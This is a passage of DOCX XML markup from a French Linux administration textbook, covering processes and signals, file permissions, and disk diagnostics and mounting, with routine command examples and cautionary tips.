        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2857500"/>
            <wp:docPr id="58" name="Picture 58"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f56.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId88"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2857500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.56 — La hiérarchie des processus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Sept commandes de processus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ps aux                     # tous les processus</w:t>
        <w:br/>
        <w:t>ps -eo pid,ppid,stat,pcpu,pmem,cmd --sort=-pcpu | head</w:t>
        <w:br/>
        <w:t>top -b -n 1                # instantané</w:t>
        <w:br/>
        <w:t>pgrep -af nginx            # chercher par nom</w:t>
        <w:br/>
        <w:t>pstree -p                  # arborescence</w:t>
        <w:br/>
        <w:br/>
        <w:t>kill 1234                  # SIGTERM : demande l'arrêt</w:t>
        <w:br/>
        <w:t>kill -9 1234               # SIGKILL : tue sans négociation</w:t>
        <w:br/>
        <w:t>kill -HUP 1234             # rechargement de configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.164 — Cinq signaux et leur usage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185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Signal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="159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Numéro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="225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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1856"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SIGTERM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1591"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Demande d'arrêt propre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Par défaut</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="185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SIGKILL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Arrêt immédiat, non capturable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="225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Dernier recours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1856"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SIGHUP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1591"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rechargement de configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Nginx, sshd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="185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SIGINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Interruption (Ctrl+C)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="225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Terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1856"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SIGSTOP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1591"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Suspension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Diagnostic</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ARRÊTER AVANT DE TUER</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SIGTERM</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> laisse au programme le temps de fermer ses fichiers et de finir ses requêtes. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>kill -9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> interrompt tout : réservé aux processus bloqués, il peut laisser des verrous et des fichiers corrompus.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>47.4 Droits et propriété</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chaque fichier possède un propriétaire, un groupe et trois jeux de droits : lecture, écriture, exécution. Les droits sont vérifiés dans l'ordre propriétaire, groupe, autres.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une ligne de `ls -l` décodée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-rw-r--r--  1 alice devs  1024 Mar 14 10:02 notes.txt</w:t>
        <w:br/>
        <w:t>drwxr-xr-x  2 alice devs  4096 Mar 14 10:02 documents</w:t>
        <w:br/>
        <w:t>lrwxrwxrwx  1 alice devs     8 Mar 14 10:02 lien -&gt; notes.txt</w:t>
        <w:br/>
        <w:br/>
        <w:t># Type | propriétaire | groupe | autres</w:t>
        <w:br/>
        <w:t>#  -   |   rw-        |  r--   |  r--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.165 — Trois droits, deux significations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154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Droit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="380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Répertoire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1549"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>r</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3662"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Lire le contenu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Lister les entrées</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="154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w</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Modifier le contenu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="38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Créer, renommer, supprimer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1549"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3662"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Exécuter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Traverser (entrer dans)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Six commandes de droits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chmod 644 fichier      # rw-r--r--</w:t>
        <w:br/>
        <w:t>chmod 755 script.sh    # rwxr-xr-x</w:t>
        <w:br/>
        <w:t>chmod u+x script.sh    # ajoute l'exécution au propriétaire</w:t>
        <w:br/>
        <w:t>chmod g-w fichier      # retire l'écriture au groupe</w:t>
        <w:br/>
        <w:br/>
        <w:t>chown alice:devs fichier</w:t>
        <w:br/>
        <w:t>chgrp devs fichier</w:t>
        <w:br/>
        <w:t>umask                  # droits retirés à la création (0022)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois bits à connaître, deux vérifications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Bits spéciaux</w:t>
        <w:br/>
        <w:t>chmod 4755 programme   # setuid : s'exécute avec les droits du propriétaire</w:t>
        <w:br/>
        <w:t>chmod 2775 dossier     # setgid : les nouveaux fichiers héritent du groupe</w:t>
        <w:br/>
        <w:t>chmod 1777 /tmp        # sticky : seul le propriétaire peut supprimer</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérifier avant d'appliquer à tout un arbre</w:t>
        <w:br/>
        <w:t>find /var/www -type f -exec chmod 640 {} \;</w:t>
        <w:br/>
        <w:t>find /var/www -type d -exec chmod 750 {} \;</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NE JAMAIS FAIRE `CHMOD -R 777`</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Ce réflexe ouvre tous les fichiers à tous les utilisateurs et masque un problème de propriété. Sur un serveur, il transforme une erreur de configuration en faille de sécurité.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>47.5 Disques et systèmes de fichiers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un espace saturé est l'une des causes d'incident les plus fréquentes et les plus faciles à prévenir. Quatre commandes suffisent au diagnostic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Cinq commandes de diagnostic disque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df -h                      # occupation par système de fichiers</w:t>
        <w:br/>
        <w:t>du -sh /var/* | sort -h    # répartition dans /var</w:t>
        <w:br/>
        <w:t>lsblk                      # périphériques et points de montage</w:t>
        <w:br/>
        <w:t>findmnt                    # montages actuels</w:t>
        <w:br/>
        <w:t>ncdu /var                  # explorateur interactif</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un montage persistant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Monter un volume</w:t>
        <w:br/>
        <w:t>mkfs.ext4 /dev/sdb1</w:t>
        <w:br/>
        <w:t>mount /dev/sdb1 /mnt/donnees</w:t>
        <w:br/>
        <w:br/>
        <w:t># Rendre le montage persistant (vérifier avec mount -a)</w:t>
        <w:br/>
        <w:t>echo "UUID=$(blkid -s UUID -o value /dev/sdb1) /mnt/donnees ext4 defaults 0 2"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &gt;&gt; /etc/fstab</w:t>
        <w:br/>
        <w:br/>
        <w:t># Tester sans redémarrer</w:t>
        <w:br/>
        <w:t>mount -a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un inode peut être épuisé alors que l'espace disque reste disponible : des millions de petits fichiers suffisent. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>df -i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> révèle ce cas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>47.6 Journaux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>systemd-journald</w:t>
      </w:r>
      <w:r>
        <w:rPr>
